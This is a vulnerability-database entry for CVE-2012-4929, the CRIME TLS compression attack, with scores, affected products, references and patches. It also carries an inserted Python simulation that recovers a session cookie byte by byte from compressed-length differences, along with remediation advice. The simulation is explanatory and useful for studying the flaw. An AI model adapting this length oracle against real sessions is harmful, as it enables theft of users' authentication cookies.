Lumension® Endpoint Intelligence Center


Overview

Vulnerability Score 2.6 (CVSS v2 base score)
CVE Id CVE-2012-4929
Last Modified 01 Sep 2015 01:00:43
Published 15 Sep 2012 02:55:03
Confidentiality Impact PARTIAL
Integrity Impact NONE
Availability Impact NONE
Access Vector NETWORK
Access Complexity HIGH
Authentication NONE

CVE-2012-4929

Summary

The TLS protocol 1.2 and earlier, as used in Mozilla Firefox, Google Chrome, Qt, and other products, can encrypt compressed data without properly obfuscating the length of the unencrypted data, which allows man-in-the-middle attackers to obtain plaintext HTTP headers by observing length differences during a series of guesses in which a string in an HTTP request potentially matches an unknown string in an HTTP header, aka a "CRIME" attack.
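The leak described above, as an added example that is not part of this advisory or of any of the referenced products: a Python simulation of the CRIME length oracle and the byte-at-a-time recovery it enables. It assumes the request is compressed with DEFLATE (zlib) before encryption under a stream cipher, so the record length on the wire equals compressed length plus a constant; that the attacker controls the query string and can observe record lengths; and that the cookie name (secret), its 16-hex-digit value, the host name and the MAC length are constructed sample values. It forces zlib's static Huffman table (Z_FIXED) so that the correct guess is exactly one byte shorter than every wrong one; with the default dynamic Huffman coding the difference is noisier, and the recovery routine reports ties instead of guessing. Passing strategy=None models the fix (TLS compression disabled), under which every candidate produces the same length.

```python
"""Simulated CRIME compression-length oracle (added example, not advisory code).

Assumptions (constructed for this example):
  * TLS compression is DEFLATE (zlib) and the cipher is a stream cipher, so
    ciphertext length == compressed length + a constant MAC length.
  * The attacker controls the query string and observes record lengths;
    the victim's browser attaches the secret cookie automatically.
  * zlib.Z_FIXED forces static Huffman codes so the one-literal saving of a
    correct guess is exactly one byte; real stacks use dynamic codes.
"""
import string
import zlib

SECRET_COOKIE = "f0e1d2c3b4a59687"   # constructed 16-hex-digit secret, all digits distinct
ALPHABET = string.hexdigits[:16]     # "0123456789abcdef"
COOKIE_NAME = "secret"
MAC_LEN = 20                         # assumed constant overhead (e.g. HMAC-SHA1)


def build_request(attacker_query: str, cookie_value: str = SECRET_COOKIE) -> bytes:
    """Plaintext request: attacker-controlled query, browser-supplied Cookie."""
    return (
        f"GET /?q={attacker_query} HTTP/1.1\r\n"
        f"Host: example.com\r\n"
        f"Cookie: {COOKIE_NAME}={cookie_value}\r\n\r\n"
    ).encode()


def ciphertext_length(plaintext: bytes, strategy=zlib.Z_FIXED) -> int:
    """What a man-in-the-middle observes: the TLS record length.

    strategy=None models TLS compression disabled (the fix): the length then
    depends only on the plaintext length, not on its content.
    """
    if strategy is None:
        return len(plaintext) + MAC_LEN
    c = zlib.compressobj(9, zlib.DEFLATED, -15, 8, strategy)  # raw DEFLATE
    return len(c.compress(plaintext) + c.flush()) + MAC_LEN


def guess_lengths(known: str, strategy=zlib.Z_FIXED) -> dict:
    """One guessing round: inject 'secret=<known><c>' for each candidate c
    and record the observed record length."""
    return {
        c: ciphertext_length(build_request(f"{COOKIE_NAME}={known}{c}"), strategy)
        for c in ALPHABET
    }


def recover_secret(length: int, strategy=zlib.Z_FIXED) -> str:
    """Byte-at-a-time recovery: the candidate that extends the LZ77
    back-reference into the real Cookie header by one byte saves one
    literal, so its record is shorter than every other candidate's."""
    known = ""
    for _ in range(length):
        lengths = guess_lengths(known, strategy)
        best = min(lengths.values())
        winners = [c for c, n in lengths.items() if n == best]
        if len(winners) != 1:
            # Ties mean the oracle gave no signal (compression off) or
            # Huffman noise hid the one-literal difference; a real attacker
            # re-measures with different padding rather than guessing.
            raise RuntimeError(f"ambiguous guess after {known!r}: {winners}")
        known += winners[0]
    return known


if __name__ == "__main__":
    print("recovered:", recover_secret(len(SECRET_COOKIE)))
    print("first-round lengths:", guess_lengths(""))
```

The first round already shows the signal: the entry for "f" (the true first digit) is one byte shorter than every other candidate, and each later round extends the known prefix by one byte. With strategy=None every candidate yields the same length and recover_secret raises, which is why the remediation for this CVE is to disable TLS-level compression rather than to change how headers are laid out. To check a live endpoint, `openssl s_client -connect host:443` prints `Compression: NONE` when the server no longer negotiates compression.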

Vulnerable Systems

Operating System

  • Debian Linux 7.0

  • Debian Linux 8.0

Application

  • Google Chrome

  • Mozilla Firefox


References

MISC - https://threatpost.com/en_us/blogs/demo-crime-tls-attack-091212

MISC - https://gist.github.com/3696912

MISC - https://community.qualys.com/blogs/securitylabs/2012/09/14/crime-information-leakage-attack-against-ssltls

CONFIRM - https://chromiumcodereview.appspot.com/10825183

MISC - http://www.theregister.co.uk/2012/09/14/crime_tls_attack/

MISC - http://www.iacr.org/cryptodb/data/paper.php?pubkey=3091

MISC - http://www.ekoparty.org/2012/thai-duong.php

MISC - http://threatpost.com/en_us/blogs/new-attack-uses-ssltls-information-leak-hijack-https-sessions-090512

MISC - http://threatpost.com/en_us/blogs/crime-attack-uses-compression-ratio-tls-requests-side-channel-hijack-secure-sessions-091312

MISC - http://security.stackexchange.com/questions/19911/crime-how-to-beat-the-beast-successor

MISC - http://news.ycombinator.com/item?id=4510829

MISC - http://isecpartners.com/blog/2012/9/14/details-on-the-crime-attack.html

CONFIRM - http://code.google.com/p/chromium/issues/detail?id=139744

MISC - http://arstechnica.com/security/2012/09/crime-hijacks-https-sessions/

CONFIRM - https://bugzilla.redhat.com/show_bug.cgi?id=857051

UBUNTU - USN-1628-1

SUSE - openSUSE-SU-2012:1420

DEBIAN - DSA-2579

UBUNTU - USN-1627-1

BID - 55704

SUSE - openSUSE-SU-2013:0157

SUSE - openSUSE-SU-2013:0143

DEBIAN - DSA-2627

REDHAT - RHSA-2013:0587

CONFIRM - http://support.apple.com/kb/HT5784

APPLE - APPLE-SA-2013-06-04-1

UBUNTU - USN-1898-1

FEDORA - FEDORA-2013-4403

DEBIAN - DSA-3253

Related Patches

Apple 2013-06-04 Security Update 2013-002 Server (Lion)

Novell SUSE 2012:6935 libQtWebKit-devel security update for SLE 11 SP2 i586

Novell SUSE 2012:6935 libQtWebKit-devel security update for SLE 11 SP2 x86_64

Novell SUSE 2013:7548 libopenssl-devel security update for SLE 11 SP2 i586

Novell SUSE 2013:7548 libopenssl-devel security update for SLE 11 SP2 x86_64

Novell SUSE 2013:8517 openssl security update for SLE 10 SP4 i586

Novell SUSE 2013:8517 openssl security update for SLE 10 SP4 x86_64


Last Updated: 27 May 2016 11:00:43